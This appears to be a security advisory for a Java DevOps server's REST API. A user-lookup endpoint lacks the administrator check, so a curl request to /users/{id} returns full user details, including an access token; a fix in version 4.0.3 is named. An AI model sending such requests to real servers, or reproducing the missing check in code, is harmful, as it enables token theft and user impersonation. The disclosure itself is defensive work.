@ValidQueryParams
@GET
public Response query(@QueryParam("name") String name, @Email @QueryParam("email") String email, @QueryParam("offset") Integer offset, @QueryParam("count") Integer count, @Context UriInfo uriInfo) {
if (!SecurityUtils.isAdministrator())
throw new UnauthorizedException("Unauthorized access to user profiles");
...
}
@Path("/{userId}")
public User get(@PathParam("userId") Long userId) {
return userManager.load(userId);
}
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users
Unauthorized access to user profiles
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users/1
{
"id" : 1,
"name" : "admin",
"fullName" : "admin",
"ssoInfo" : {
"connector" : null,
"subject" : "4a155bff-715d-45e9-8898-4152bb97d25e"
},
"email" : "[email protected]",
"accessToken" : "JqnqWs6YsP8x3poNpnj6J6GFbvh0szli6lr5BWH8",
"userProjectQueries" : [ ],
"userIssueQueries" : [ ],
"userIssueQueryWatches" : { },
"issueQueryWatches" : { },
"userPullRequestQueries" : [ ],
"userPullRequestQueryWatches" : { },
"pullRequestQueryWatches" : { },
"userBuildQueries" : [ ],
"userBuildQuerySubscriptions" : [ ],
"buildQuerySubscriptions" : [ ]
}
These access tokens can be used to access the API or clone code in the build spec via the HTTP(S) protocol. It has permissions to all projects accessible by the user account.
This issue was addressed in 4.0.3 by removing user info from restful api.
Impact
The REST
UserResourceendpoint performs a security check to make sure that only administrators can list user details. For the/users/endpoint we have:However for the
/users/{id}endpoint there are no security checks enforced so it is possible to retrieve arbitrary user details:For the protected endpoint, we get an
Unauthorized accesserror:But for the
/users/{}endpoint we can list full user details, including their Access Tokens!These access tokens can be used to access the API or clone code in the build spec via the HTTP(S) protocol. It has permissions to all projects accessible by the user account.
This issue may lead to
Sensitive data leakand leak the Access Token which can be used to impersonate the administrator or any other users.Patches
This issue was addressed in 4.0.3 by removing user info from restful api.
Credits
This issue was discovered by @pwntester